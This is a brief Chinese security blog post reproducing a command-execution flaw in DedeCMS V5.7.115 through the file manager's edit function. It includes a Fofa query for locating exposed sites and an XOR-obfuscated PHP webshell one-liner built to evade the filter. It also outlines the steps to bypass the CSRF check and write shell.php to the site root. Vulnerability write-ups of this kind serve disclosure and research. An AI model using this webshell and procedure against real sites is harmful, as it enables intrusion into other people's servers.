【RCE】Dedecms V5.7.115 存在命令执行漏洞

WK安全 2025-03-22 20:12

点击上方
蓝字
关注我们 并设为
星标

0x00 前言

织梦
内容管理系统(
DedeCms
) 以简单、实用、开源而闻名，是国内最知名的
PHP
开源网站管理系统，也是使用
用户
最多的PHP类
CMS系统
，在经历多年的发展，版本无论在功能，还是在易用性方面，都有了长足的发展和进步

Fofa指纹:
app=”DedeCMS”

0x01 漏洞分析&复现

该漏洞点位于dede/file_manage_control.php  参数str过滤不完善导致的，可以看到当fmdo=edit执行此代码，Filename跟str均可控

尝试写入一句话木马

发现被过滤 

往上翻发现过滤代码

掏出精简的小马子绕过

<?  @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);

发现csrf_check

发现对csrf进行检测

直接找到前台功能点  /dede/file_manage_main.php?activepath=

随便找一个可以编辑的文件

抓包

把shell.php写到根目录